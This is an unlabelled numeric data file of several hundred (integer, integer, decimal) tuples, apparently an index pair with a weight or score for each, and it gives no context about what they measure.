(292, 78297, 0.88669),
(236, 78299, 0.37331),
(269, 78299, 0.37331),
(174, 82474, 0.93331),
(238, 82474, 0.93331),
(240, 82474, 0.93331),
(255, 82474, 0.93331),
(257, 82474, 0.93331),
(238, 82475, 1.00331),
(240, 82475, 1.00331),
(255, 82475, 1.00331),
(257, 82475, 1.00331),
(174, 84608, 0.28),
(269, 84608, 0.28),
(237, 84608, 0.56),
(237, 84887, 0.93331),
(241, 84887, 0.93331),
(237, 84889, 0.91),
(242, 84889, 0.91),
(256, 84889, 0.91),
(237, 84890, 0.98),
(256, 84890, 0.98),
(237, 84891, 0.23331),
(240, 84891, 0.23331),
(257, 84891, 0.23331),
(275, 84891, 0.23331),
(292, 84891, 0.23331),
(237, 84892, 0.95669),
(240, 84892, 0.95669),
(237, 84896, 0.91),
(241, 84896, 0.91),
(267, 84909, 0.98),
(237, 84909, 5.88),
(237, 84915, 0.91),
(174, 84915, 1.82),
(237, 84916, 0.98),
(174, 84916, 1.96),
(237, 84917, 0.91),
(178, 84917, 1.82),
(237, 84920, 1.16669),
(240, 84920, 1.16669),
(237, 84921, 0.95669),
(247, 84921, 0.95669),
(237, 84922, 0.95669),
(268, 84922, 0.95669),
(305, 84922, 0.95669),
(306, 84922, 0.95669),
(237, 84939, 0.95669),
(243, 84939, 0.95669),
(255, 84939, 0.95669),
(267, 84939, 0.95669),
(306, 84939, 0.95669),
(269, 84939, 1.91338),
(237, 84940, 1.12),
(255, 84940, 1.12),
(168, 84953, 0.88669),
(237, 84953, 0.88669),
(239, 91023, 0.91),
(255, 91023, 0.91),
(273, 91023, 0.91),
(295, 91023, 0.91),
(272, 91023, 1.82),
(280, 91023, 1.82),
(259, 91023, 3.64),
(260, 91023, 3.64),
(239, 91024, 1.07331),
(255, 91024, 1.07331),
(273, 91024, 1.07331),
(295, 91024, 1.07331),
(272, 91024, 2.14662),
(280, 91024, 2.14662),
(259, 91024, 4.29324),
(260, 91024, 4.29324),
(239, 91072, 0.84),
(242, 91072, 0.84),
(255, 91072, 0.84),
(239, 91076, 0.86331),
(241, 91076, 0.86331),
(246, 91076, 0.86331),
(255, 91076, 0.86331),
(268, 91076, 0.86331),
(304, 91076, 0.86331),
(259, 92025, 0.42),
(260, 92025, 0.42),
(304, 92025, 0.42),
(240, 92025, 0.84),
(238, 92025, 3.42),
(238, 92040, 0.46669),
(243, 92040, 0.46669),
(238, 92679, 0.28),
(243, 92679, 0.28),
(238, 92686, 0.93331),
(246, 92686, 0.93331),
(238, 92698, 0.88669),
(263, 92698, 0.88669),
(238, 92703, 0.95669),
(239, 92703, 0.95669),
(238, 92708, 0.88669),
(268, 92708, 0.88669),
(238, 92710, 0.98),
(240, 92710, 0.98),
(270, 92710, 0.98),
(301, 92710, 0.98),
(306, 92710, 0.98),
(238, 92725, 0.93331),
(262, 92725, 0.93331),
(174, 92727, 0.88669),
(239, 92727, 0.88669),
(243, 92727, 0.88669),
(256, 92727, 0.88669),
(263, 92727, 0.88669),
(265, 92727, 0.88669),
(266, 92727, 0.88669),
(274, 92727, 0.88669),
(306, 92727, 0.88669),
(238, 92727, 2.66007),
(174, 92729, 0.98),
(238, 92729, 1.96),
(238, 92731, 0.95669),
(247, 92731, 0.95669),
(258, 92731, 0.95669),
(304, 92731, 0.95669),
(267, 92731, 1.91338),
(238, 92732, 1.09669),
(258, 92732, 1.09669),
(238, 92737, 0.98),
(248, 92737, 0.98),
(238, 92738, 1.05),
(248, 92738, 1.05),
(238, 92749, 0.93331),
(243, 92749, 0.93331),
(238, 92763, 0.91),
(256, 92763, 0.91),
(238, 92764, 0.98),
(256, 92764, 0.98),
(238, 92780, 0.95669),
(240, 92780, 0.95669),
(256, 92780, 0.95669),
(288, 92780, 0.95669),
(238, 92785, 0.91),
(249, 92785, 0.91),
(270, 92785, 0.91),
(274, 92785, 0.91),
(301, 92785, 0.91),
(305, 92785, 0.91),
(306, 92785, 0.91),
(243, 92785, 4.55),
(238, 92789, 0.91),
(247, 92789, 0.91),
(265, 92789, 0.91),
(266, 92789, 0.91),
(304, 92789, 0.91),
(238, 92791, 0.91),
(242, 92791, 0.91),
(288, 92791, 1.82),
(240, 92791, 4.55),
(262, 92793, 0.28),
(306, 92793, 0.28),
(238, 92793, 0.56),
(238, 92798, 0.91),
(241, 92798, 0.91),
(305, 92798, 0.91),
(238, 92800, 0.91),
(267, 92800, 0.91),
(288, 92800, 1.82),
(238, 92802, 0.28),
(263, 92802, 1.12),
(238, 92805, 0.91),
(240, 92805, 0.91),
(238, 92807, 0.95669),
(240, 92807, 0.95669),
(178, 92809, 0.86331),
(243, 92809, 0.86331),
(247, 92809, 0.86331),
(268, 92809, 0.86331),
(274, 92809, 0.86331),
(288, 92809, 0.86331),
(304, 92809, 0.86331),
(306, 92809, 0.86331),
(238, 92809, 1.72662),
(239, 92809, 2.09661),
(242, 92809, 3.82323),
(240, 92809, 7.27647),
(239, 92810, 0.88669),
(244, 92810, 0.88669),
(268, 92810, 0.88669),
(269, 92810, 0.88669),
(238, 92810, 1.77338),
(178, 92810, 2.66007),
(238, 92812, 1.02669),
(239, 92812, 1.02669),
(178, 92812, 3.08007),
(238, 92813, 0.88669),
(239, 92813, 0.88669),
(238, 92821, 0.88669),
(248, 92821, 0.88669),
(249, 92821, 0.88669),
(262, 92821, 0.88669),
(174, 92824, 0.88669),
(238, 92824, 0.88669),
(168, 92828, 0.86331),
(238, 92828, 0.86331),
(239, 92828, 0.86331),
(256, 92828, 0.86331),
(272, 92828, 0.86331),
(280, 92828, 0.86331),
(240, 92828, 1.72662),
(238, 92838, 0.88669),
(240, 92838, 0.88669),
(248, 92838, 0.88669),
(305, 92838, 0.88669),
(238, 92842, 0.88669),
(275, 92842, 0.88669),
(238, 92844, 0.18669),
(242, 92844, 0.18669),
(256, 92844, 0.18669),
(261, 92844, 0.18669),
(275, 92844, 0.18669),
(292, 92844, 0.18669),
(306, 92844, 0.18669),
(238, 92849, 0.18669),
(178, 92849, 0.37338),
(238, 92852, 0.23331),
(246, 92852, 0.23331),
(247, 92852, 0.23331),
(265, 92852, 0.23331),
(266, 92852, 0.23331),
(238, 92853, 0.88669),
(265, 92853, 0.88669),
(266, 92853, 0.88669),
(239, 99789, 0.79331),
(244, 99789, 0.79331),
(239, 100291, 0.51331),
(240, 100291, 0.51331),
(262, 100291, 0.51331),
(178, 100300, 0.42),
(239, 100300, 0.42),
(239, 100324, 1.05),
(240, 100324, 1.05),
(292, 100324, 1.05),
(262, 100324, 2.1),
(239, 100325, 1.16669),
(262, 100325, 1.16669),
(239, 100327, 0.28),
(240, 100327, 0.28),
(239, 100328, 0.88669),
(240, 100328, 0.88669),
(239, 100329, 1.02669),
(240, 100329, 1.02669),
(239, 101074, 0.91),
(268, 101074, 0.91),
(174, 101076, 0.84),
(239, 101076, 0.84),
(241, 101076, 0.84),
(243, 101076, 6.84),
(239, 101086, 0.95669),
(240, 101086, 0.95669),
(239, 101087, 1.14331),
(240, 101087, 1.14331),
(178, 101091, 0.91),
(239, 101091, 0.91),
(168, 101094, 1.00331),
(239, 101094, 1.00331),
(306, 101094, 1.00331),
(239, 101098, 0.91),
(240, 101098, 0.91),
(239, 101128, 0.98),
(267, 101128, 0.98),
(274, 101132, 1.91338),
(239, 101132, 2.87007),
(239, 101141, 0.91),
(241, 101141, 0.91),
(242, 101141, 0.91),
(239, 101143, 0.98),
(240, 101143, 0.98),
(268, 101143, 1.96),
(239, 101144, 1.09669),
(240, 101144, 1.09669),
(239, 101145, 0.88669),
(262, 101145, 1.77338),
(239, 101149, 0.88669),
(240, 101149, 0.88669),
(239, 101150, 0.95669),
(240, 101150, 0.95669),
(274, 101153, 0.88669),
(239, 101153, 1.77338),
(239, 101158, 0.91),
(240, 101158, 0.91),
(239, 101159, 0.98),
(240, 101159, 0.98),
(239, 101162, 0.95669),
(241, 101162, 0.95669),
(273, 101173, 0.86331),
(288, 101173, 0.86331),
(304, 101173, 0.86331),
(239, 101173, 1.72662),
(174, 101173, 2.58993),
(239, 101179, 1.05),
(240, 101179, 1.05),
(239, 101191, 0.88669),
(246, 101191, 0.88669),
(174, 101191, 1.77338),
(239, 101193, 0.93331),
(263, 101193, 0.93331),
(273, 101207, 0.98),
(239, 101210, 0.93331),
(240, 101210, 0.93331),
(242, 101210, 0.93331),
(239, 101214, 0.91),
(240, 101214, 0.91),
(262, 101214, 0.91),
(178, 101234, 0.91),
(239, 101234, 0.91),
(239, 101245, 0.84),
(272, 101245, 0.84),
(280, 101245, 0.84),
(299, 101245, 0.84),
(306, 101245, 0.84),
(178, 101245, 1.68),
(240, 101247, 0.93331),
(242, 101247, 0.93331),
(306, 101247, 0.93331),
(239, 101247, 2.79993),
(239, 101268, 0.84),
(241, 101268, 0.84),
(242, 101268, 0.84),
(268, 101268, 0.84),
(272, 101268, 0.84),
(280, 101268, 0.84),
(292, 101268, 0.84),
(174, 101268, 1.68),
(258, 101268, 1.68),
(269, 101268, 1.68),
(275, 101268, 1.68),
(239, 101274, 0.86331),
(244, 101274, 0.86331),
(265, 101274, 0.86331),
(266, 101274, 0.86331),
(178, 101274, 1.72662),
(239, 101276, 0.91),
(249, 101276, 0.91),
(239, 101282, 0.88669),
(268, 101282, 0.88669),
(239, 101291, 0.88669),
(269, 101291, 0.88669),
(240, 101297, 0.32669),
(239, 101297, 0.65338),
(240, 101315, 0.18669),
(242, 101315, 0.18669),
(239, 101315, 0.37338),
(255, 101815, 0.18669),
(258, 101815, 0.18669),
(255, 101816, 0.91),
(258, 101816, 0.91),
(255, 101817, 0.98),
(258, 101817, 0.98),
(174, 101945, 0.18669),
(240, 101945, 0.18669),
(255, 101945, 0.37338),
(248, 102267, 0.91),
(255, 102267, 0.91),
(305, 102267, 0.91),
(240, 102272, 0.98),
(241, 102272, 0.98),
(255, 102272, 0.98),
(259, 102272, 0.98),
(260, 102272, 0.98),
(268, 102272, 0.98),
(288, 102272, 0.98),
(244, 102278, 0.93331),
(255, 102278, 0.93331),
(255, 102283, 0.98),
(256, 102283, 0.98),
(255, 102286, 0.91),
(258, 102286, 0.91),
(292, 102286, 0.91),
(240, 102295, 0.95669),
(255, 102295, 0.95669),
(178, 102299, 0.93331),
(255, 102299, 0.93331),
(258, 102299, 0.93331),
(255, 102301, 0.91),
(178, 102301, 1.82),
(255, 102307, 0.93331),
(241, 102307, 1.86662),
(240, 102310, 0.84),
(243, 102310, 0.84),
(245, 102310, 0.84),
(259, 102310, 0.84),
(260, 102310, 0.84),
(255, 102310, 1.68),
(264, 102310, 1.68),
(255, 102324, 0.88669),
(268, 102324, 0.88669),
(274, 102324, 0.88669),
(244, 102326, 0.28),
(255, 102326, 0.28),
(261, 102326, 0.28),
(290, 102326, 0.28),
(240, 108572, 0.93331),
(256, 108572, 0.93331),
(256, 108589, 0.86331),
(257, 108589, 0.86331),
(275, 108589, 0.86331),
(263, 108589, 1.72662),
(262, 108589, 3.45324),
(248, 110181, 0.46669),
(257, 110181, 0.46669),
(265, 110181, 0.46669),
(266, 110181, 0.46669),
(273, 110181, 0.46669),
(304, 110181, 0.46669),
(240, 110181, 0.93338),
(242, 110181, 1.40007),
(257, 110184, 0.32669),
(262, 110184, 0.32669),
(241, 110516, 0.91),
(257, 110516, 0.91),
(269, 110516, 0.91),
(275, 110516, 0.91),
(288, 110516, 0.91),
(241, 110517, 0.98),
(257, 110517, 0.98),
(269, 110517, 0.98),
(275, 110517, 0.98),
(288, 110517, 0.98),
(257, 110531, 0.88669),
(258, 110531, 0.88669),
(262, 110531, 0.88669),
(288, 110531, 0.88669),
(304, 110531, 0.88669),
(241, 110538, 0.88669),
(257, 110538, 0.88669),
(261, 110538, 0.88669),
(290, 110538, 0.88669),
(275, 110538, 1.77338),
(306, 110538, 1.77338),
(274, 110538, 2.66007),
(257, 110539, 0.98),
(274, 110539, 0.98),
(257, 110543, 0.93331),
(272, 110543, 0.93331),
(273, 110543, 0.93331),
(280, 110543, 0.93331),
(257, 110547, 1.02669),
(261, 110547, 3.08007),
(306, 110547, 3.08007),
(246, 110554, 1.05),
(257, 110554, 1.05),
(240, 110555, 0.88669),
(257, 110555, 0.88669),
(257, 110559, 0.95669),
(258, 110559, 0.95669),
(257, 110560, 1.02669),
(258, 110560, 1.02669),
(178, 110563, 0.95669),
(257, 110563, 0.95669),
(288, 110563, 1.91338),
(240, 110578, 0.46669),
(242, 110578, 0.46669),
(257, 110578, 0.46669),
(248, 110578, 0.93338),
(274, 110582, 0.91),
(257, 110582, 2.73),
(257, 110604, 0.93331),
(269, 110604, 0.93331),
(304, 110604, 0.93331),
(257, 110612, 0.93331),
(262, 110612, 0.93331),
(240, 114507, 0.86331),
(241, 114507, 0.86331),
(256, 114949, 0.14),
(287, 114949, 0.14),
(275, 114949, 0.74),
(256, 115107, 0.23331),
(274, 115107, 0.23331),
(241, 115107, 0.46662),
(267, 115107, 0.46662),
(178, 115121, 0.46669),
(246, 115121, 0.46669),
(256, 115121, 0.46669),
(273, 115121, 2.33345),
(241, 115124, 0.51331),
(242, 115124, 0.51331),
(256, 115124, 0.51331),
(267, 115124, 0.51331),
(288, 115124, 0.51331),
(174, 115124, 1.53993),
(256, 115519, 1.02669),
(262, 115519, 1.02669),
(243, 115525, 0.95669),
(256, 115525, 0.95669),
(263, 115525, 0.95669),
(274, 115525, 0.95669),
(306, 115525, 0.95669),
(256, 115535, 1.00331),
(241, 115535, 2.00662),
(174, 115539, 0.88669),
(178, 115539, 0.88669),
(242, 115539, 0.88669),
(246, 115539, 0.88669),
(256, 115539, 0.88669),
(262, 115539, 0.88669),
(288, 115539, 0.88669),
(241, 115539, 1.77338),
(256, 115550, 0.91),
(267, 115550, 0.91),
(269, 115550, 0.91),
(275, 115550, 0.91),
(256, 115551, 1.00331),
(267, 115551, 1.00331),
(248, 115556, 0.95669),
(256, 115556, 0.95669),
(256, 115572, 0.95669),
(265, 115572, 2.87007),
(266, 115572, 2.87007),
(256, 115581, 0.91),
(258, 115581, 0.91),
(178, 146387, 0.91),
(241, 146387, 0.91),
(243, 146387, 0.91),
(263, 146387, 0.91),
(240, 147175, 0.91),
(263, 147175, 0.91),
(240, 147176, 1.02669),
(263, 147176, 1.02669),
(240, 147187, 0.32669),
(270, 147187, 0.32669),
(301, 147187, 0.32669),
(272, 147187, 0.65338),
(280, 147187, 3.31357),
(240, 147188, 0.93331),
(270, 147188, 0.93331),
(301, 147188, 0.93331),
(259, 147192, 0.84),
(260, 147192, 0.84),
(240, 148040, 0.28),
(305, 148040, 0.56),
(261, 148040, 0.84),
(240, 148069, 1.00331),
(263, 148069, 1.00331),
(265, 148070, 0.88669),
(266, 148070, 0.88669),
(240, 148070, 1.77338),
(265, 148071, 0.95669),
(266, 148071, 0.95669),
(240, 148071, 1.91338),
(240, 148076, 1.00331),
(244, 148076, 3.43992),
(240, 148077, 0.88669),
(245, 148077, 0.88669),
(249, 148077, 0.88669),
(247, 148077, 1.77338),
(168, 148087, 0.98),
(240, 148087, 0.98),
(245, 148087, 0.98),
(240, 148092, 1.91338),
(274, 148092, 9.5669),
(240, 148100, 0.98),
(262, 148100, 1.96),
(240, 148101, 1.09669),
(262, 148101, 1.09669),
(240, 148106, 0.91),
(261, 148106, 0.91),
(240, 148108, 0.91),
(245, 148108, 0.91),
(246, 148108, 1.82),
(240, 148122, 1.00331),
(248, 148122, 1.00331),
(240, 148123, 1.09669),
(248, 148123, 1.09669),
(240, 148127, 1.02669),
(258, 148127, 1.02669),
(240, 148137, 0.91),
(259, 148137, 0.91),
(260, 148137, 0.91),
(272, 148137, 0.91),
(280, 148137, 0.91),
(240, 148164, 0.95669),
(262, 148164, 0.95669),
(240, 148166, 0.95669),
(265, 148166, 0.95669),
(266, 148166, 0.95669),
(275, 148166, 0.95669),
(262, 148186, 1.05),
(240, 148186, 2.1),
(240, 148193, 0.95669),
(259, 148193, 0.95669),
(260, 148193, 0.95669),
(174, 148196, 0.81669),
(240, 148196, 0.81669),
(262, 148196, 0.81669),
(306, 148196, 0.81669),
(305, 148196, 1.63338),
(240, 148197, 1.00331),
(262, 148197, 1.00331),
(240, 148198, 0.86331),
(272, 148198, 0.86331),
(280, 148198, 0.86331),
(244, 148202, 0.86331),
(305, 148202, 0.86331),
(240, 148202, 1.72662),
(262, 148202, 1.72662),
(240, 148205, 0.88669),
(258, 148205, 0.88669),
(264, 148205, 0.88669),
(306, 148205, 0.88669),
(240, 148209, 0.84),
(244, 148209, 0.84),
(269, 148209, 1.68),
(240, 148211, 0.86331),
(304, 148211, 0.86331),
(269, 148211, 1.72662),
(168, 148214, 0.95669),
(240, 148214, 0.95669),
(272, 148214, 0.95669),
(280, 148214, 0.95669),
(241, 149333, 1.05),
(242, 149333, 1.05),
(241, 150437, 0.32669),
(242, 150437, 0.32669),
(241, 150444, 0.88669),
(242, 150444, 0.88669),
(261, 150444, 0.88669),
(304, 150444, 0.88669),
(306, 150444, 0.88669),
(242, 150470, 0.93331),
(258, 150470, 0.93331),
(242, 150507, 0.98),
(259, 150507, 0.98),
(260, 150507, 0.98),
(174, 150719, 0.91),
(242, 150719, 0.91),
(259, 150719, 0.91),
(260, 150719, 0.91),
(292, 150719, 0.91),
(306, 150719, 0.91),
(241, 150721, 0.88669),
(242, 150721, 0.88669),
(241, 150722, 0.95669),
(242, 150722, 0.95669),
(241, 150738, 0.86331),
(242, 150738, 0.86331),
(242, 150748, 0.86331),
(258, 150748, 2.58993),
(242, 150749, 0.95669),
(258, 150749, 1.91338),
(241, 150782, 0.86331),
(242, 150782, 0.86331),
(244, 150782, 0.86331),
(261, 150782, 0.86331),
(306, 150782, 0.86331),
(242, 150803, 0.18669),
(244, 150803, 0.18669),
(258, 150803, 0.18669),
(261, 150803, 0.18669),
(290, 150803, 0.18669),
(292, 150803, 0.18669),
(259, 150803, 0.37338),
(260, 150803, 0.37338),
(274, 150803, 0.37338),
(306, 150803, 0.37338),
(273, 150803, 0.56007),
(242, 150804, 0.86331),
(259, 150804, 0.86331),
(260, 150804, 0.86331),
(242, 150820, 0.18669),
(245, 150820, 0.18669),
(248, 150820, 0.18669),
(240, 150820, 0.37338),
(243, 150820, 0.56007),
(241, 150826, 0.88669),
(242, 150826, 0.88669),
(243, 157215, 0.32669),
(264, 157215, 0.32669),
(168, 157824, 0.91),
(243, 157824, 0.91),
(246, 157824, 0.91),
(292, 157824, 0.91),
(174, 157826, 1.02669),
(243, 157826, 1.02669),
(259, 157826, 1.02669),
(260, 157826, 1.02669),
(268, 157826, 1.02669),
(174, 157840, 1.00331),
(243, 157840, 1.00331),
(292, 157840, 1.00331),
(306, 157840, 1.00331),
(243, 157846, 0.93331),
(275, 157846, 0.93331),
(243, 157849, 0.91),
(259, 157849, 0.91),
(260, 157849, 0.91),
(243, 157856, 0.91),
(265, 157856, 0.91),
(266, 157856, 0.91),
(288, 157856, 3.64),
(243, 157857, 0.98),
(265, 157857, 0.98),
(266, 157857, 0.98),
(243, 157863, 0.88669),
(245, 157863, 0.88669),
(243, 157911, 0.98),
(261, 157911, 0.98),
(243, 157923, 0.86331),
(269, 157923, 0.86331),
(288, 157923, 0.86331),
(243, 157927, 0.88669),
(304, 157927, 0.88669),
(258, 157927, 1.77338),
(243, 157956, 0.91),
(273, 157956, 0.91),
(304, 157956, 0.91),
(306, 157956, 1.82),
(241, 159163, 0.91),
(267, 159163, 0.91),
(274, 159163, 0.91),
(178, 159167, 0.37331),
(241, 159167, 0.37331),
(241, 159184, 0.32669),
(274, 159184, 0.32669),
(241, 159610, 0.37331),
(259, 159610, 0.37331),
(260, 159610, 0.37331),
(241, 159622, 0.91),
(272, 159622, 0.91),
(280, 159622, 0.91),
(178, 159638, 0.88669),
(258, 159638, 0.88669),
(241, 159638, 1.77338),
(241, 159639, 1.02669),
(258, 159639, 1.02669),
(168, 159644, 1.02669),
(241, 159644, 1.02669),
(258, 159644, 1.02669),
(261, 159644, 1.02669),
(246, 159650, 0.86331),
(305, 159650, 0.86331),
(241, 159650, 1.72662),
(241, 159660, 1.02669),
(178, 159660, 3.08007),
(241, 159671, 1.07331),
(273, 159671, 10.1198),
(247, 159676, 0.93331),
(241, 159676, 1.86662),
(258, 159677, 0.18669),
(290, 159677, 0.18669),
(241, 159677, 0.37338),
(178, 159677, 0.74676),
(274, 159677, 0.74676),
(241, 159689, 0.93331),
(244, 159689, 0.93331),
(178, 159702, 0.86331),
(241, 159702, 0.86331),
(290, 159702, 2.58993),
(178, 159704, 0.91),
(241, 159704, 0.91),
(241, 159718, 0.84),
(292, 159718, 0.84),
(269, 159718, 1.68),
(241, 159719, 0.93331),
(292, 159719, 0.93331),
(269, 159719, 1.86662),
(241, 159722, 0.88669),
(273, 159722, 0.88669),
(241, 159725, 1.05),
(258, 159725, 1.05),
(241, 159726, 0.95669),
(245, 159726, 0.95669),
(304, 159726, 0.95669),
(241, 159736, 0.95669),
(261, 159736, 0.95669),
(306, 159736, 0.95669),
(178, 163182, 0.18669),
(258, 163182, 0.18669),
(258, 163610, 0.93331),
(272, 163610, 0.93331),
(280, 163610, 0.93331),
(288, 163610, 0.93331),
(247, 163625, 0.95669),
(258, 163625, 0.95669),
(259, 163625, 0.95669),
(260, 163625, 0.95669),
(174, 163625, 1.91338),
(178, 163646, 0.91),
(248, 163646, 0.91),
(274, 163646, 0.91),
(292, 163646, 0.91),
(258, 163646, 14.56),
(178, 163647, 0.98),
(248, 163647, 0.98),
(274, 163647, 0.98),
(292, 163647, 0.98),
(258, 163647, 15.68),
(258, 163655, 0.98),
(264, 163655, 0.98),
(270, 163656, 0.91),
(301, 163656, 0.91),
(258, 163656, 1.82),
(174, 163686, 0.98),
(248, 163686, 0.98),
(258, 163686, 0.98),
(258, 163690, 0.86331),
(261, 163690, 0.86331),
(273, 163690, 0.86331),
(290, 163690, 0.86331),
(306, 163690, 0.86331),
(168, 168181, 0.21),
(242, 168181, 0.21),
(242, 168724, 0.32669),
(272, 168724, 0.32669),
(280, 168724, 0.32669),
(161, 168727, 0.18669),
(242, 168727, 0.18669),
(304, 168727, 0.18669),
(306, 168727, 0.18669),
(178, 168727, 0.37338),
(239, 168735, 0.28),
(242, 168735, 0.28),
(248, 168735, 0.28),
(261, 168735, 0.28),
(263, 168735, 0.28),
(288, 168735, 0.28),
(290, 168735, 0.28),
(240, 168754, 1.02669),
(242, 168754, 1.02669),
(242, 168756, 0.93331),
(248, 168756, 0.93331),
(242, 168758, 0.37331),
(252, 168758, 0.37331),
(262, 168758, 0.74662),
(248, 168764, 0.37331),
(242, 168764, 1.11993),
(247, 169848, 0.18669),
(248, 169848, 0.37338),
(242, 169848, 0.56007),
(168, 169848, 0.74676),
(242, 169893, 0.91),
(273, 169893, 0.91),
(238, 169902, 1.00331),
(242, 169902, 1.00331),
(242, 169916, 0.28),
(265, 169916, 0.28),
(266, 169916, 0.28),
(267, 169916, 0.28),
(272, 169916, 0.28),
(273, 169916, 0.28),
(280, 169916, 0.28),
(306, 169916, 0.28),
(257, 169916, 0.56),
(240, 169919, 1.14331),
(242, 169919, 1.14331),
(239, 169923, 1.00331),
(242, 169923, 1.00331),
(288, 169923, 1.00331),
(246, 169923, 8.16981),
(242, 169939, 1.00331),
(299, 169939, 1.00331),
(242, 169942, 0.95669),
(272, 169942, 0.95669),
(280, 169942, 0.95669),
(242, 169960, 1.02669),
(253, 169960, 1.02669),
(299, 169960, 1.02669),
(242, 169966, 0.93331),
(273, 169966, 1.86662),
(249, 169968, 0.88669),
(255, 169968, 0.88669),
(292, 169968, 0.88669),
(242, 169968, 1.77338),
(249, 169969, 1.02669),
(242, 169969, 2.05338),
(236, 169972, 1.00331),
(242, 169972, 1.00331),
(242, 169982, 1.14331),
(269, 169982, 1.14331),
(240, 169983, 1.02669),
(267, 169983, 1.02669),
(242, 169983, 2.05338),
(242, 169990, 1.00331),
(262, 169990, 1.00331),
(174, 170001, 0.95669),
(242, 170001, 0.95669),
(242, 170006, 0.91),
(272, 170006, 0.91),
(280, 170006, 0.91),
(237, 170032, 0.91),
(242, 170032, 1.82),
(239, 170035, 0.93331),
(242, 170035, 0.93331),
(236, 170040, 0.95669),
(242, 170040, 1.91338),
(240, 170045, 0.91),
(242, 170045, 0.91),
(242, 170052, 0.91),
(256, 170052, 0.91),
(269, 170052, 0.91),
(239, 170080, 0.93331),
(242, 170080, 0.93331),
(269, 170080, 0.93331),
(239, 170081, 1.02669),
(242, 170081, 1.02669),
(269, 170081, 1.02669),
(239, 170084, 1.00331),
(242, 170084, 1.00331),
(174, 170094, 0.98),
(244, 170094, 0.98),
(269, 170094, 0.98),
(274, 170094, 0.98),
(288, 170094, 0.98),
(242, 170094, 1.96),
(178, 170098, 0.37331),
(247, 170098, 0.37331),
(242, 170098, 1.11993),
(242, 170105, 0.98),
(193, 170105, 1.96),
(273, 170122, 0.88669),
(242, 170122, 1.77338),
(242, 170144, 0.84),
(244, 170144, 0.84),
(274, 170144, 0.84),
(239, 170150, 0.91),
(242, 170150, 0.91),
(264, 170150, 0.91),
(168, 170154, 0.84),
(246, 170154, 0.84),
(267, 170154, 0.84),
(268, 170154, 0.84),
(275, 170154, 0.84),
(305, 170154, 0.84),
(242, 170154, 1.68),
(244, 170154, 1.68),
(290, 170154, 2.52),
(233, 170156, 0.93331),
(242, 170156, 1.86662),
(273, 170160, 0.88669),
(299, 170160, 0.88669),
(242, 170160, 1.77338),
(242, 170177, 0.91),
(245, 170177, 0.91),
(239, 170180, 0.88669),
(242, 170180, 0.88669),
(306, 170180, 0.88669),
(290, 170180, 5.32014),
(239, 170181, 0.98),
(242, 170181, 0.98),
(290, 170181, 0.98),
(240, 170182, 0.88669),
(242, 170182, 0.88669),
(247, 170182, 0.88669),
(242, 170184, 0.86331),
(246, 170184, 0.86331),
(239, 170189, 0.98),
(242, 170189, 0.98),
(240, 170191, 0.98),
(242, 170191, 0.98),
(292, 170191, 0.98),
(242, 170200, 0.84),
(263, 170200, 0.84),
(306, 170200, 1.68),
(242, 170213, 0.88669),
(275, 170213, 0.88669),
(239, 170215, 0.88669),
(242, 170215, 0.88669),
(242, 170220, 0.23331),
(305, 170220, 0.23331),
(174, 170220, 0.69993),
(242, 170223, 1.02669),
(240, 170223, 2.05338),
(259, 173459, 1.00331),
(260, 173459, 1.00331),
(259, 173460, 1.21331),
(260, 173460, 1.21331),
(259, 173461, 0.91),
(260, 173461, 0.91),
(174, 173462, 0.28),
(259, 173462, 0.28),
(260, 173462, 0.28),
(268, 173462, 0.28),
(259, 173463, 0.95669),
(260, 173463, 0.95669),
(259, 173464, 1.16669),
(260, 173464, 1.16669),
(259, 173465, 0.46669),
(260, 173465, 0.46669),
(261, 173465, 0.46669),
(263, 173465, 0.46669),
(272, 173465, 0.46669),
(280, 173465, 0.46669),
(305, 173465, 0.46669),
(259, 173466, 1.02669),
(260, 173466, 1.02669),
(259, 173467, 1.09669),
(260, 173467, 1.09669),
(259, 173763, 1.00331),
(260, 173763, 1.00331),
(259, 173764, 1.19),
(260, 173764, 1.19),
(259, 173765, 0.95669),
(260, 173765, 0.95669),
(259, 173766, 1.09669),
(260, 173766, 1.09669),
(259, 173767, 0.32669),
(260, 173767, 0.32669),
(259, 173768, 0.93331),
(260, 173768, 0.93331),
(259, 173769, 1.05),
(260, 173769, 1.05),
(259, 173770, 1.02669),
(260, 173770, 1.02669),
(259, 173771, 1.16669),
(260, 173771, 1.16669),
(259, 173772, 1.07331),
(260, 173772, 1.07331),
(259, 173773, 2.14662),
(260, 173773, 2.14662),
(259, 173774, 1.02669),
(260, 173774, 1.02669),
(259, 173775, 1.00331),
(260, 173775, 1.00331),
(259, 173776, 1.14331),
(260, 173776, 1.14331),
(259, 173777, 1.05),
(260, 173777, 1.05),
(247, 173778, 1.02669),
(259, 173778, 1.02669),
(260, 173778, 1.02669),
(174, 173778, 2.05338),
(259, 173779, 1.00331),
(260, 173779, 1.00331),
(259, 173780, 1.23669),
(260, 173780, 1.23669),
(259, 173781, 0.86331),
(260, 173781, 0.86331),
(259, 173782, 0.95669),
(260, 173782, 0.95669),
(259, 173783, 1.91338),
(260, 173783, 1.91338),
(259, 173784, 1.05),
(260, 173784, 1.05),
(259, 173785, 1.02669),
(260, 173785, 1.02669),
(259, 173786, 0.95669),
(260, 173786, 0.95669),
(259, 173787, 1.05),
(260, 173787, 1.05),
(259, 173788, 0.95669),
(260, 173788, 0.95669),
(259, 173789, 1.05),
(260, 173789, 1.05),
(259, 173790, 1.02669),
(260, 173790, 1.02669),
(306, 173790, 1.02669),
(259, 173791, 1.07331),
(260, 173791, 1.07331),
(259, 173792, 0.93331),
(260, 173792, 0.93331),
(259, 173793, 1.02669),
(260, 173793, 1.02669),
(259, 173794, 0.98),
(260, 173794, 0.98),
(259, 173795, 0.95669),
(260, 173795, 0.95669),
(288, 173795, 0.95669),
(259, 173796, 0.98),
(260, 173796, 0.98),
(259, 173797, 1.14331),
(260, 173797, 1.14331),
(259, 173798, 0.93331),
(260, 173798, 0.93331),
(259, 173799, 1.14331),
(260, 173799, 1.14331),
(259, 173800, 0.93331),
(260, 173800, 0.93331),
(273, 173800, 0.93331),
(306, 173800, 0.93331),
(259, 173801, 1.02669),
(260, 173801, 1.02669),
(259, 173802, 0.98),
(260, 173802, 0.98),
(306, 173802, 0.98),
(262, 173802, 1.96),
(259, 173803, 1.21331),
(260, 173803, 1.21331),
(259, 173804, 1.00331),
(260, 173804, 1.00331),
(263, 173804, 1.00331),
(259, 173805, 1.12),
(260, 173805, 1.12),
(259, 173806, 0.95669),
(260, 173806, 0.95669),
(259, 173807, 1.02669),
(260, 173807, 1.02669),
(259, 173808, 1.00331),
(260, 173808, 1.00331),
(174, 173809, 1.07331),
(259, 173809, 1.07331),
(260, 173809, 1.07331),
